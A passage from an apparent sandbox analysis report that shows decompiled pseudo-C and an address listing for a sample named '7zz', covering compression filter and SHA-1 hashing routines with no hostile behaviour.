									_t613 = E004441E0(_t641, __eflags);
									_t330 =  *(_t661 + 0x14);
									__eflags = _t330;
									 *(_t661 + 0x78) = 0;
									if(_t330 != 0) {
										 *((intOrPtr*)( *_t330 + 8))(_t330);
									}
									 *(_t661 + 0x78) = 0xffffffff;
									E00437D6C(_t641 + 0x24);
									E00437D6C(_t641 + 0x4c);
									E00437D6C(_t641 + 0x74);
									_t334 =  *(_t641 + 0xb4);
									__eflags = _t334;
									if(_t334 != 0) {
										 *((intOrPtr*)( *_t334 + 8))(_t334);
										 *(_t641 + 0xb4) = 0;
									}
									_t310 = _t613;
									goto L142;
								} else {
									goto L107;
								}
								do {
									L107:
									_t614 =  *((intOrPtr*)(_t661 + 0x10));
									_t483 = _t614 + 0x10;
									_t452 =  *((intOrPtr*)( *((intOrPtr*)(_t614 + 8)) + _t648));
									 *( *((intOrPtr*)(_t614 + 0x14)) +  *_t483) = _t452;
									_t340 =  *((intOrPtr*)(_t483 + 4)) + 1;
									__eflags = _t340 -  *((intOrPtr*)(_t483 + 8));
									 *((intOrPtr*)(_t483 + 4)) = _t340;
									if(__eflags == 0) {
										E0040EFBD(_t483, __eflags);
									}
									__eflags = _t452 - 0xe8;
									if(_t452 != 0xe8) {
										__eflags = _t452 - 0xe9;
										if(_t452 != 0xe9) {
											__eflags =  *(_t661 + 0x80) - 0xf;
											if( *(_t661 + 0x80) != 0xf) {
												goto L118;
											}
											__eflags = (_t452 & 0x000000f0) - 0x80;
											if((_t452 & 0x000000f0) != 0x80) {
												goto L118;
											}
											_t486 = 0x101;
											goto L116;
										}
										_t486 = 0x100;
										goto L116;
									} else {
										_t486 =  *(_t661 + 0x80) & 0x000000ff;
										L116:
										_t640[4] = (_t640[4] >> 0xb) *  *(_t614 + 0xc8 + _t486 * 4);
										 *(_t614 + 0xc8 + _t486 * 4) = (0x800 -  *(_t614 + 0xc8 + _t486 * 4) >> 5) +  *(_t614 + 0xc8 + _t486 * 4);
										_t346 = _t640[4];
										__eflags = _t346 - 0x1000000;
										if(_t346 < 0x1000000) {
											_t347 = _t346 << 8;
											__eflags = _t347;
											_t640[4] = _t347;
											E00444C10(_t640);
										}
									}
									L118:
									_t648 = _t648 + 1;
									__eflags = _t648 -  *(_t661 + 0x20);
									 *(_t661 + 0x80) = _t452;
								} while (__eflags < 0);
								goto L119;
							}
							_t615 = _t612 + 0xfffffffb;
							__eflags = _t615;
							 *(_t661 + 0x8c) = 0;
							 *(_t661 + 0x30) = _t615;
							do {
								_t616 =  *((intOrPtr*)(_t661 + 0x10));
								_t649 =  *(_t661 + 0x8c);
								_t453 =  *((intOrPtr*)( *((intOrPtr*)(_t616 + 8)) + _t649));
								_t490 = _t616 + 0x10;
								 *( *((intOrPtr*)(_t616 + 0x10)) +  *((intOrPtr*)(_t616 + 0x14))) = _t453;
								 *(_t661 + 0x94) = _t453;
								_t352 =  *((intOrPtr*)(_t490 + 4)) + 1;
								__eflags = _t352 -  *((intOrPtr*)(_t490 + 8));
								 *((intOrPtr*)(_t490 + 4)) = _t352;
								if(__eflags == 0) {
									E0040EFBD(_t490, __eflags);
								}
								__eflags = (_t453 & 0x000000fe) - 0xe8;
								if((_t453 & 0x000000fe) == 0xe8) {
									L23:
									_t493 =  *((intOrPtr*)( *((intOrPtr*)(_t616 + 8)) + _t649 + 4));
									 *(_t661 + 0x84) = _t493;
									_t567 =  *((intOrPtr*)(_t661 + 0x18));
									 *(_t661 + 0x2c) = 0 << 8 << 8;
									_t79 = _t567 + 5; // 0x5
									_t568 = (0 << 8 << 8) + _t649 + _t79;
									_t357 =  *(_t661 + 0x14);
									__eflags = _t357;
									 *(_t661 + 0x1c) = _t568;
									if(_t357 == 0) {
										__eflags =  *(_t661 + 0x88);
										if( *(_t661 + 0x88) == 0) {
											__eflags = _t493;
											if(_t493 == 0) {
												L64:
												_t494 = 1;
												L65:
												_t453 =  *(_t661 + 0x94);
												__eflags = _t453 - 0xe8;
												if(_t453 != 0xe8) {
													__eflags = _t453 - 0xe9;
													_t361 = (0 | _t453 != 0x000000e9) + 0x100;
													__eflags = _t361;
												} else {
													_t361 =  *(_t661 + 0x80) & 0x000000ff;
												}
												__eflags = _t494;
												if(_t494 == 0) {
													_t569 =  *((intOrPtr*)(_t661 + 0x10));
													_t640[4] = (_t640[4] >> 0xb) *  *(_t569 + 0xc8 + _t361 * 4);
													 *(_t569 + 0xc8 + _t361 * 4) = (0x800 -  *(_t569 + 0xc8 + _t361 * 4) >> 5) +  *(_t569 + 0xc8 + _t361 * 4);
													_t362 = _t640[4];
													__eflags = _t362 - 0x1000000;
													if(_t362 >= 0x1000000) {
														L95:
														_t210 = _t661 + 0x8c;
														 *_t210 =  *(_t661 + 0x8c) + 1;
														__eflags =  *_t210;
														goto L96;
													}
													_t625 = _t640[2];
													__eflags = _t625 - 0xff000000;
													_t640[4] = _t362 << 8;
													if(_t625 < 0xff000000) {
														L89:
														_t460 = _t640[1];
														_t626 =  &(_t640[6]);
														do {
															 *((char*)( *_t626 + _t626[1])) = E0046B2E0(_t640[2], 0x20, _t640[3]) + _t460;
															_t580 = _t626[1] + 1;
															_t626[1] = _t580;
															__eflags = _t580 - _t626[2];
															if(__eflags == 0) {
																E0040EFBD(_t626, __eflags);
															}
															_t460 = _t460 | 0x000000ff;
															_t384 =  *_t640 - 1;
															__eflags = _t384;
															 *_t640 = _t384;
														} while (_t384 != 0);
														_t625 = _t640[2];
														_t386 = _t625 >> 0x18;
														__eflags = _t386;
														_t640[1] = _t386;
														L94:
														_t453 =  *(_t661 + 0x94);
														_t627 = _t625 << 8;
														__eflags = _t627;
														_t640[2] = _t627;
														 *_t640 =  *_t640 + 1;
														_t640[3] = 0;
														goto L95;
													}
													_t389 = E0046B2E0(_t625, 0x20, _t640[3]);
													__eflags = _t389;
													if(_t389 == 0) {
														goto L94;
													}
													goto L89;
												} else {
													_t582 = _t640[4];
													_t628 =  *((intOrPtr*)(_t661 + 0x10));
													_t517 = (_t582 >> 0xb) *  *(_t628 + 0xc8 + _t361 * 4);
													_t640[2] = _t640[2] + _t517;
													asm("adc ebp, 0x0");
													_t640[4] = _t582 - _t517;
													 *(_t628 + 0xc8 + _t361 * 4) =  *(_t628 + 0xc8 + _t361 * 4) - ( *(_t628 + 0xc8 + _t361 * 4) >> 5);
													_t390 = _t640[4];
													__eflags = _t390 - 0x1000000;
													if(_t390 >= 0x1000000) {
														L78:
														__eflags = _t453 - 0xe8;
														 *(_t661 + 0x8c) =  *(_t661 + 0x8c) + 5;
														if(_t453 != 0xe8) {
															_t629 =  *((intOrPtr*)(_t661 + 0x10)) + 0x60;
														} else {
															_t629 =  *((intOrPtr*)(_t661 + 0x10)) + 0x38;
														}
														_t657 =  *(_t661 + 0x1c);
														_t461 = 0x18;
														do {
															 *((char*)( *((intOrPtr*)(_t629 + 4)) +  *_t629)) = _t657 >> _t461;
															_t589 =  *((intOrPtr*)(_t629 + 4)) + 1;
															 *((intOrPtr*)(_t629 + 4)) = _t589;
															__eflags = _t589 -  *((intOrPtr*)(_t629 + 8));
															if(__eflags == 0) {
																E0040EFBD(_t629, __eflags);
															}
															_t461 = _t461 - 8;
															__eflags = _t461;
														} while (_t461 >= 0);
														 *(_t661 + 0x80) =  *(_t661 + 0x84);
														goto L97;
													}
													_t630 = _t640[2];
													__eflags = _t630 - 0xff000000;
													_t640[4] = _t390 << 8;
													if(_t630 < 0xff000000) {
														L72:
														_t462 = _t640[1];
														_t631 =  &(_t640[6]);
														do {
															 *((char*)( *_t631 + _t631[1])) = E0046B2E0(_t640[2], 0x20, _t640[3]) + _t462;
															_t593 = _t631[1] + 1;
															_t631[1] = _t593;
															__eflags = _t593 - _t631[2];
															if(__eflags == 0) {
																E0040EFBD(_t631, __eflags);
															}
															_t462 = _t462 | 0x000000ff;
															_t402 =  *_t640 - 1;
															__eflags = _t402;
															 *_t640 = _t402;
														} while (_t402 != 0);
														_t630 = _t640[2];
														_t404 = _t630 >> 0x18;
														__eflags = _t404;
														_t640[1] = _t404;
														L77:
														_t453 =  *(_t661 + 0x94);
														_t632 = _t630 << 8;
														__eflags = _t632;
														_t640[2] = _t632;
														 *_t640 =  *_t640 + 1;
														_t640[3] = 0;
														goto L78;
													}
													_t407 = E0046B2E0(_t630, 0x20, _t640[3]);
													__eflags = _t407;
													if(_t407 == 0) {
														goto L77;
													}
													goto L72;
												}
											}
											__eflags = _t493 - 0xff;
											if(_t493 == 0xff) {
												goto L64;
											}
											_t494 = 0;
											goto L65;
										}
										__eflags = 0 -  *(_t661 + 0x5c);
										if(__eflags > 0) {
											L60:
											_t494 = 0;
											goto L65;
										}
										if(__eflags < 0) {
											goto L64;
										}
										__eflags = _t568 -  *((intOrPtr*)(_t661 + 0x58));
										if(_t568 <  *((intOrPtr*)(_t661 + 0x58))) {
											goto L64;
										}
										goto L60;
									}
									_t658 = _t649 +  *((intOrPtr*)(_t661 + 0x48));
									asm("adc ebx, edi");
									__eflags =  *(_t661 + 0x3c);
									if(__eflags > 0) {
										L38:
										__eflags = _t357;
										if(_t357 != 0) {
											_t634 =  *(_t661 + 0x40);
											_t597 =  *(_t661 + 0x3c);
											_t411 =  *(_t661 + 0x38) - _t634;
											__eflags = _t411;
											asm("sbb edx, [esp+0x44]");
											 *(_t661 + 0x6c) = _t597;
											if(_t411 != 0) {
												L46:
												__eflags = _t493;
												if(_t493 == 0) {
													goto L64;
												}
												__eflags = _t493 - 0xff;
												if(_t493 == 0xff) {
													goto L64;
												}
												_t494 = 0;
												goto L65;
											}
											__eflags = _t411 - 0x1000000;
											if(_t411 <= 0x1000000) {
												asm("cdq");
												asm("adc edx, ebx");
												_t414 =  *(_t661 + 0x2c) + _t658 + 5;
												asm("adc edx, 0x0");
												__eflags = _t597 -  *(_t661 + 0x44);
												if(__eflags < 0) {
													L55:
													_t494 = 0;
													goto L65;
												}
												if(__eflags > 0) {
													L52:
													__eflags = _t597 -  *(_t661 + 0x3c);
													if(__eflags > 0) {
														goto L55;
													}
													if(__eflags < 0) {
														goto L64;
													}
													__eflags = _t414 -  *(_t661 + 0x38);
													if(_t414 <  *(_t661 + 0x38)) {
														goto L64;
													}
													goto L55;
												}
												__eflags = _t414 - _t634;
												if(_t414 < _t634) {
													goto L55;
												}
												goto L52;
											}
											goto L46;
										}
										__eflags =  *(_t661 + 0x88);
										if( *(_t661 + 0x88) == 0) {
											goto L46;
										}
										__eflags = 0 -  *(_t661 + 0x5c);
										if(__eflags > 0) {
											L43:
											_t494 = 0;
											goto L65;
										}
										if(__eflags < 0) {
											goto L64;
										}
										__eflags =  *(_t661 + 0x1c) -  *((intOrPtr*)(_t661 + 0x58));
										if( *(_t661 + 0x1c) <  *((intOrPtr*)(_t661 + 0x58))) {
											goto L64;
										}
										goto L43;
									}
									if(__eflags < 0) {
										goto L27;
										do {
											do {
												L27:
												_t624 =  *((intOrPtr*)( *_t357 + 0xc))(_t357,  *((intOrPtr*)(_t661 + 0x58)),  *((intOrPtr*)(_t661 + 0x58)), _t661 + 0x60);
												__eflags = _t624;
												if(_t624 != 0) {
													__eflags = _t624 - 1;
													if(_t624 == 1) {
														L31:
														_t357 =  *(_t661 + 0x14);
														__eflags = _t357;
														if(_t357 != 0) {
															 *((intOrPtr*)( *_t357 + 8))(_t357);
															_t357 = 0;
															__eflags = 0;
															 *(_t661 + 0x14) = 0;
														}
														 *(_t661 + 0x40) = 0;
														 *(_t661 + 0x44) = 0;
														__eflags = 0xffffffff;
														 *(_t661 + 0x38) = 0xffffffff;
														 *(_t661 + 0x3c) = 0xffffffff;
														goto L34;
													}
													__eflags = _t624 - 0x80004001;
													if(_t624 != 0x80004001) {
														_t420 =  *(_t661 + 0x14);
														 *(_t661 + 0x78) = 0;
														__eflags = _t420;
														if(_t420 != 0) {
															 *((intOrPtr*)( *_t420 + 8))(_t420);
														}
														_t644 =  *((intOrPtr*)(_t661 + 0x10));
														 *(_t661 + 0x78) = 0xffffffff;
														E00437D6C(_t644 + 0x24);
														E00437D6C(_t644 + 0x4c);
														_t423 =  *(_t644 + 0x74);
														__eflags = _t423;
														if(_t423 != 0) {
															 *((intOrPtr*)( *_t423 + 8))(_t423);
															 *(_t644 + 0x74) = 0;
														}
														_t424 =  *(_t644 + 0xb4);
														__eflags = _t424;
														if(_t424 != 0) {
															 *((intOrPtr*)( *_t424 + 8))(_t424);
															 *(_t644 + 0xb4) = 0;
														}
														L130:
														_t310 = _t624;
														goto L142;
													}
													goto L31;
												}
												_t428 =  *(_t661 + 0x38);
												_t545 =  *(_t661 + 0x3c);
												 *(_t661 + 0x40) = _t428;
												 *(_t661 + 0x44) = _t545;
												 *(_t661 + 0x38) = _t428 +  *((intOrPtr*)(_t661 + 0x60));
												asm("adc ecx, edi");
												 *(_t661 + 0x3c) = _t545;
												asm("adc eax, 0x0");
												 *((intOrPtr*)(_t661 + 0x50)) =  *((intOrPtr*)(_t661 + 0x50)) + 1;
												_t357 =  *(_t661 + 0x14);
												L34:
												__eflags =  *(_t661 + 0x3c);
											} while (__eflags < 0);
											if(__eflags > 0) {
												break;
											}
											__eflags =  *(_t661 + 0x38) - _t658;
										} while ( *(_t661 + 0x38) < _t658);
										_t493 =  *(_t661 + 0x84);
										goto L38;
									}
									__eflags =  *(_t661 + 0x38) - _t658;
									if( *(_t661 + 0x38) >= _t658) {
										goto L38;
									}
									goto L27;
								} else {
									__eflags =  *(_t661 + 0x80) - 0xf;
									if( *(_t661 + 0x80) != 0xf) {
										L22:
										 *(_t661 + 0x8c) = _t649 + 1;
										L96:
										 *(_t661 + 0x80) = _t453;
										goto L97;
									}
									__eflags = (_t453 & 0x000000f0) - 0x80;
									if((_t453 & 0x000000f0) == 0x80) {
										goto L23;
									}
									goto L22;
								}
								L97:
								_t650 =  *(_t661 + 0x8c);
								__eflags = _t650 -  *(_t661 + 0x30);
							} while (_t650 <=  *(_t661 + 0x30));
							_t364 =  *(_t661 + 0x98);
							 *((intOrPtr*)(_t661 + 0x18)) =  *((intOrPtr*)(_t661 + 0x18)) + _t650;
							_t451 = 0;
							asm("adc edx, ebx");
							__eflags = _t364;
							 *((intOrPtr*)(_t661 + 0x48)) =  *((intOrPtr*)(_t661 + 0x48)) + _t650;
							if(_t364 == 0) {
								L100:
								_t623 =  *(_t661 + 0x20);
								__eflags = _t650 - _t623;
								if(_t650 >= _t623) {
									L102:
									continue;
								} else {
									goto L101;
								}
								do {
									L101:
									_t451 = _t451 + 1;
									_t650 = _t650 + 1;
									__eflags = _t650 - _t623;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x10)) + 8)) + _t451 - 1)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t661 + 0x10)) + 8)) + _t650 - 1));
								} while (_t650 < _t623);
								goto L102;
							}
							_t624 =  *((intOrPtr*)( *_t364 + 0xc))(_t364, _t661 + 0x48, 0);
							__eflags = _t624;
							if(_t624 != 0) {
								_t368 =  *(_t661 + 0x14);
								 *(_t661 + 0x78) = 0;
								__eflags = _t368;
								if(_t368 != 0) {
									 *((intOrPtr*)( *_t368 + 8))(_t368);
								}
								_t643 =  *((intOrPtr*)(_t661 + 0x10));
								 *(_t661 + 0x78) = 0xffffffff;
								_t369 =  *(_t643 + 0x24);
								__eflags = _t369 - _t451;
								if(_t369 != _t451) {
									 *((intOrPtr*)( *_t369 + 8))(_t369);
									 *(_t643 + 0x24) = _t451;
								}
								_t370 =  *(_t643 + 0x4c);
								__eflags = _t370 - _t451;
								if(_t370 != _t451) {
									 *((intOrPtr*)( *_t370 + 8))(_t370);
									 *(_t643 + 0x4c) = _t451;
								}
								_t371 =  *(_t643 + 0x74);
								__eflags = _t371 - _t451;
								if(_t371 != _t451) {
									 *((intOrPtr*)( *_t371 + 8))(_t371);
									 *(_t643 + 0x74) = _t451;
								}
								_t372 =  *(_t643 + 0xb4);
								__eflags = _t372 - _t451;
								if(_t372 == _t451) {
									goto L130;
								} else {
									 *((intOrPtr*)( *_t372 + 8))(_t372);
									 *(_t643 + 0xb4) = _t451;
									_t310 = _t624;
									goto L142;
								}
							}
							goto L100;
						}
					}
					_t446 =  *_t312;
					__eflags = _t446;
					if(_t446 == 0) {
						goto L10;
					}
					_t548 =  *_t446;
					_t447 =  *(_t446 + 4);
					__eflags = _t447;
					 *((intOrPtr*)(_t661 + 0x58)) = _t548;
					 *(_t661 + 0x5c) = _t447;
					if(__eflags > 0) {
						goto L10;
					}
					if(__eflags < 0) {
						L9:
						 *(_t661 + 0x88) = 1;
						goto L10;
					}
					__eflags = _t548 - 0x1000000;
					if(_t548 > 0x1000000) {
						goto L10;
					}
					goto L9;
				} else {
					_t310 = 0x8007000e;
					goto L142;
				}
			}

0x004442e0
0x004442e2
0x004442ed
0x004442ee
0x004442f5
0x00444300
0x00444305
0x00444309
0x00444bf6
0x00444bf6
0x00444bfb
0x00444c03
0x00444c0d
0x00444c0d
0x0044430f
0x00444317
0x00000000
0x00000000
0x00444324
0x00444330
0x00444339
0x0044433b
0x00444343
0x00444347
0x0044434b
0x00444376
0x00444376
0x0044437a
0x0044438b
0x00444391
0x00444394
0x00444398
0x004443a0
0x004443ac
0x004443b4
0x004443c0
0x004443c8
0x004443d7
0x004443dc
0x004443e5
0x004443ea
0x004443fd
0x00444400
0x00444407
0x0044440d
0x00444411
0x00444411
0x00444413
0x00444424
0x0044442c
0x0044442e
0x0044442e
0x00444430
0x00444434
0x00444438
0x0044443c
0x00444443
0x00444447
0x0044444b
0x0044444f
0x00444453
0x00444457
0x0044445b
0x00444460
0x00444462
0x00444462
0x00444464
0x00000000
0x00000000
0x00000000
0x00000000
0x00444466
0x00444466
0x0044446a
0x00444482
0x00444484
0x00444486
0x00000000
0x00000000
0x0044448c
0x00444490
0x00444492
0x00000000
0x00000000
0x00444494
0x0044449d
0x0044449d
0x0044449f
0x00000000
0x00000000
0x00000000
0x0044449f
0x004449c7
0x004449cb
0x004449d0
0x004449d2
0x004449d7
0x004449d7
0x004449da
0x004449de
0x004449e9
0x004449f1
0x004449f9
0x00444a04
0x00444a09
0x00000000
0x004444a1
0x004444a1
0x004444a3
0x004444a6
0x004444aa
0x00444a10
0x00444a12
0x00444a14
0x00444ad1
0x00444ad1
0x00444adc
0x00444ade
0x00444ae2
0x00444ae4
0x00444ae9
0x00444aee
0x00444aee
0x00444af4
0x00444afc
0x00444b04
0x00444b0c
0x00444b11
0x00444b17
0x00444b19
0x00444b1e
0x00444b21
0x00444b21
0x00444b2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00444a1a
0x00444a1a
0x00444a1a
0x00444a24
0x00444a27
0x00444a2c
0x00444a35
0x00444a36
0x00444a38
0x00444a3b
0x00444a3d
0x00444a3d
0x00444a42
0x00444a45
0x00444a56
0x00444a59
0x00444a62
0x00444a6a
0x00000000
0x00000000
0x00444a71
0x00444a74
0x00000000
0x00000000
0x00444a76
0x00000000
0x00444a76
0x00444a5b
0x00000000
0x00444a47
0x00444a4e
0x00444a7b
0x00444a8e
0x00444a9f
0x00444aa6
0x00444aa9
0x00444aae
0x00444ab0
0x00444ab0
0x00444ab5
0x00444ab8
0x00444ab8
0x00444aae
0x00444abd
0x00444ac1
0x00444ac2
0x00444ac4
0x00444ac4
0x00000000
0x00444a1a
0x004444b0
0x004444b0
0x004444b3
0x004444be
0x004444c2
0x004444c2
0x004444c6
0x004444d6
0x004444d9
0x004444dc
0x004444df
0x004444ec
0x004444ed
0x004444ef
0x004444f2
0x004444f4
0x004444f4
0x004444fe
0x00444501
0x00444524
0x0044452d
0x00444542
0x00444550
0x00444554
0x0044455a
0x0044455a
0x0044455e
0x00444562
0x00444564
0x00444568
0x004446de
0x004446e0
0x004446f8
0x004446fa
0x00444705
0x00444705
0x00444707
0x00444707
0x0044470e
0x00444711
0x00444723
0x00444729
0x00444729
0x00444713
0x0044471a
0x0044471a
0x0044472e
0x00444730
0x0044487b
0x0044488a
0x004448a0
0x004448a7
0x004448aa
0x004448af
0x0044493e
0x0044493e
0x0044493e
0x0044493e
0x00000000
0x0044493e
0x004448b5
0x004448bb
0x004448c1
0x004448c4
0x004448d9
0x004448d9
0x004448dc
0x004448df
0x004448f6
0x004448ff
0x00444902
0x00444905
0x00444907
0x0044490b
0x0044490b
0x00444912
0x00444915
0x00444915
0x00444916
0x00444916
0x0044491a
0x0044491f
0x0044491f
0x00444922
0x00444925
0x00444927
0x0044492f
0x0044492f
0x00444932
0x00444935
0x00444937
0x00000000
0x00444937
0x004448d0
0x004448d5
0x004448d7
0x00000000
0x00000000
0x00000000
0x00444736
0x00444736
0x00444739
0x00444745
0x0044474f
0x00444755
0x0044475d
0x0044476e
0x00444775
0x00444778
0x0044477d
0x0044480c
0x00444816
0x00444819
0x00444820
0x0044482f
0x00444822
0x00444826
0x00444826
0x00444832
0x00444836
0x0044483b
0x00444846
0x0044484f
0x00444852
0x00444855
0x00444857
0x0044485b
0x0044485b
0x00444860
0x00444860
0x00444860
0x0044486c
0x00000000
0x0044486c
0x00444783
0x00444789
0x0044478f
0x00444792
0x004447a7
0x004447a7
0x004447aa
0x004447ad
0x004447c4
0x004447cd
0x004447d0
0x004447d3
0x004447d5
0x004447d9
0x004447d9
0x004447e0
0x004447e3
0x004447e3
0x004447e4
0x004447e4
0x004447e8
0x004447ed
0x004447ed
0x004447f0
0x004447f3
0x004447f5
0x004447fd
0x004447fd
0x00444800
0x00444803
0x00444805
0x00000000
0x00444805
0x0044479e
0x004447a3
0x004447a5
0x00000000
0x00000000
0x00000000
0x004447a5
0x00444730
0x004446fc
0x004446ff
0x00000000
0x00000000
0x00444701
0x00000000
0x00444701
0x004446e8
0x004446ea
0x004446f4
0x004446f4
0x00000000
0x004446f4
0x004446ec
0x00000000
0x00000000
0x004446ee
0x004446f2
0x00000000
0x00000000
0x00000000
0x004446f2
0x00444578
0x0044457e
0x00444580
0x00444582
0x00444646
0x00444646
0x00444648
0x00444680
0x00444684
0x00444688
0x00444688
0x0044468a
0x0044468e
0x00444692
0x0044469b
0x0044469b
0x0044469d
0x00000000
0x00000000
0x0044469f
0x004446a2
0x00000000
0x00000000
0x004446a4
0x00000000
0x004446a4
0x00444694
0x00444699
0x004446b0
0x004446b3
0x004446b5
0x004446b8
0x004446bb
0x004446bd
0x004446d3
0x004446d3
0x00000000
0x004446d3
0x004446bf
0x004446c5
0x004446c5
0x004446c9
0x00000000
0x00000000
0x004446cb
0x00000000
0x00000000
0x004446cd
0x004446d1
0x00000000
0x00000000
0x00000000
0x004446d1
0x004446c1
0x004446c3
0x00000000
0x00000000
0x00000000
0x004446c3
0x00000000
0x00444699
0x00444651
0x00444653
0x00000000
0x00000000
0x0044465b
0x0044465d
0x00444675
0x00444675
0x00000000
0x00444675
0x0044465f
0x00000000
0x00000000
0x0044466d
0x0044466f
0x00000000
0x00000000
0x00000000
0x0044466f
0x00444588
0x00000000
0x00444594
0x00444594
0x00444594
0x004445a9
0x004445ab
0x004445ad
0x004445ef
0x004445f2
0x00444600
0x00444600
0x00444604
0x00444606
0x0044460b
0x0044460e
0x0044460e
0x00444610
0x00444610
0x00444616
0x0044461a
0x0044461e
0x00444621
0x00444625
0x00000000
0x00444625
0x004445f4
0x004445fa
0x00444b32
0x00444b36
0x00444b3b
0x00444b3d
0x00444b42
0x00444b42
0x00444b45
0x00444b49
0x00444b54
0x00444b5c
0x00444b61
0x00444b66
0x00444b68
0x00444b6d
0x00444b70
0x00444b70
0x00444b73
0x00444b79
0x00444b7b
0x00444b80
0x00444b83
0x00444b83
0x00444b89
0x00444b89
0x00000000
0x00444b89
0x00000000
0x004445fa
0x004445af
0x004445b7
0x004445bf
0x004445c5
0x004445c9
0x004445d1
0x004445d3
0x004445de
0x004445e1
0x004445e9
0x00444629
0x00444629
0x00444629
0x00444633
0x00000000
0x00000000
0x00444635
0x00444635
0x0044463f
0x00000000
0x0044463f
0x0044458a
0x0044458e
0x00000000
0x00000000
0x00000000
0x00444503
0x00444503
0x0044450b
0x00444517
0x00444518
0x00444945
0x00444945
0x00000000
0x00444945
0x00444512
0x00444515
0x00000000
0x00000000
0x00000000
0x00444515
0x0044494c
0x0044494c
0x00444957
0x00444957
0x0044496b
0x00444976
0x0044497a
0x0044497f
0x00444981
0x00444983
0x0044498b
0x004449a3
0x004449a3
0x004449a7
0x004449a9
0x004449c0
0x00000000
0x00000000
0x00000000
0x00000000
0x004449ab
0x004449ab
0x004449af
0x004449b0
0x004449b4
0x004449ba
0x004449ba
0x00000000
0x004449ab
0x00444999
0x0044499b
0x0044499d
0x00444b8d
0x00444b91
0x00444b96
0x00444b98
0x00444b9d
0x00444b9d
0x00444ba0
0x00444ba4
0x00444bac
0x00444baf
0x00444bb1
0x00444bb6
0x00444bb9
0x00444bb9
0x00444bbc
0x00444bbf
0x00444bc1
0x00444bc6
0x00444bc9
0x00444bc9
0x00444bcc
0x00444bcf
0x00444bd1
0x00444bd6
0x00444bd9
0x00444bd9
0x00444bdc
0x00444be2
0x00444be4
0x00000000
0x00444be6
0x00444be9
0x00444bec
0x00444bf2
0x00000000
0x00444bf2
0x00444be4
0x00000000
0x0044499d
0x0044445b
0x0044434d
0x0044434f
0x00444351
0x00000000
0x00000000
0x00444353
0x00444355
0x00444358
0x0044435a
0x0044435e
0x00444362
0x00000000
0x00000000
0x00444364
0x0044436e
0x0044436e
0x00000000
0x0044436e
0x00444366
0x0044436c
0x00000000
0x00000000
0x00000000
0x00444326
0x00444326
0x00000000
0x00444326

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
Instruction ID: d9c78973a52d2a71a409461f923dbd808430b2c09cbe0837c917e918da1c98db
Opcode Fuzzy Hash: 847cf75e5ec63b3d96b7018282e4526a6bca975eef9a7bcce02b43c1c4303fcc
Instruction Fuzzy Hash: D75239706087418FE724CF29C480B6AF7E2BFC5314F148A1EE59987791DB38E846CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00456CF0 Relevance: .6, Instructions: 615
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E00456CF0(signed int* __ecx) {
				unsigned int* _t315;
				signed int _t317;
				signed int _t323;
				signed int _t328;
				signed int _t334;
				signed int* _t336;
				signed int* _t337;
				intOrPtr* _t340;
				intOrPtr _t341;
				signed int _t348;
				signed int _t349;
				signed int _t353;
				signed int _t358;
				signed int _t363;
				signed int _t368;
				unsigned int _t371;
				unsigned int _t380;
				signed int _t384;
				unsigned int _t389;
				signed int _t392;
				signed int _t395;
				void* _t398;
				unsigned int _t399;
				signed int _t405;
				unsigned int _t408;
				unsigned int _t414;
				signed int _t417;
				signed int _t422;
				signed int _t423;
				signed int _t429;
				signed int _t438;
				signed int _t443;
				signed int _t449;
				signed int _t455;
				signed int _t460;
				signed int _t465;
				signed int _t469;
				signed int _t474;
				signed int _t478;
				signed int _t482;
				signed int _t486;
				unsigned int _t494;
				intOrPtr* _t495;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t515;
				signed int _t516;
				signed int _t519;
				signed int _t521;
				signed int _t527;
				signed int _t531;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t558;
				signed int _t632;
				signed int _t637;
				signed int _t648;
				signed int _t662;
				signed int* _t675;
				signed int _t729;
				void* _t744;

				_t509 = __ecx[2];
				_t632 =  *__ecx;
				_t554 = __ecx[3];
				 *((intOrPtr*)(_t744 + 0x2c)) = __ecx;
				 *(_t744 + 0x1c) = __ecx[4];
				_t398 =  *(_t744 + 0x178);
				 *(_t744 + 0x10) = __ecx[1];
				 *((intOrPtr*)(_t744 + 0x28)) = _t744 + 0x34 - _t398;
				 *(_t744 + 0x18) = _t744 + 0x38;
				 *((intOrPtr*)(_t744 + 0x30)) = _t744 + 0x38 - _t398;
				_t315 = _t398 + 8;
				 *(_t744 + 0x24) = _t744 + 0x3c - _t398;
				 *(_t744 + 0x14) = 3;
				do {
					_t399 =  *(_t315 - 8);
					 *(_t744 + 0x20) = _t399;
					 *( *(_t744 + 0x18) - 4) = _t399;
					asm("rol ebx, 0x5");
					_t380 =  *(_t315 - 4);
					 *(_t744 + 0x20) = _t380;
					 *(_t744 + 0x1c) =  *(_t744 + 0x1c) + ((_t554 ^ _t509) &  *(_t744 + 0x10) ^ _t554) +  *(_t744 + 0x20) + _t632 + 0x5a827999;
					_t405 =  *(_t744 + 0x10);
					 *( *(_t744 + 0x18)) = _t380;
					asm("rol ecx, 0x1e");
					 *(_t744 + 0x10) = _t405;
					asm("rol ebx, 0x5");
					_t408 =  *_t315;
					asm("rol esi, 0x1e");
